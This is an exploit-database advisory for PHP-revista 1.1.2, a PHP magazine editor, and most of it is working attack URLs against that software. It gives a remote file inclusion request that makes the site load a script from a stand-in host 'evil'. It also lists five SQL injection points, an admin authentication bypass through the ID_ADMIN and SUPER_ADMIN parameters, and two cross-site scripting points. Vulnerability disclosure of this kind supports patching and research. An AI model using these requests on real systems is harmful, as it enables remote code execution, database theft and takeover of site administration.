PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting

Author: SirDarckCat
type: webapps
platform: php
port: 
date_added: 2009-04-13  
date_updated:   
verified: 1  
codes: OSVDB-28452;CVE-2006-4608;OSVDB-28451;CVE-2006-4607;OSVDB-28450;CVE-2006-4606;OSVDB-28449;OSVDB-28448;OSVDB-28447;OSVDB-28446;OSVDB-28445;OSVDB-28443;CVE-2006-4605  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comrevista-1.1.2.tgz  

raw file: 8425.txt  
Discovered by Sirdarckcat from elhacker.net

------------------------------------------------------------------------
------------

Revista 1.1.2

http://php-revista.sourceforge.org

------------------------------------------------------------------------
------------

Revista is a simple spanish PHP magazine editor.

It was done by php.org.mx

It suffers of multiple vulnerabilities.

------------------------------------------------------------------------
------------

Remote File Inclusion

http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script

------------------------------------------------------------------------
------------

SQLi

http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]

http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]

http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]

http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]

http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]

------------------------------------------------------------------------
------------

Credentials Bypass

http://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1

------------------------------------------------------------------------
------------

XSS

http://revista/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>

http://revista/estilo/[ANY STYLE]/lista.php?email=<XSS>

------------------------------------------------------------------------

# milw0rm.com [2009-04-14]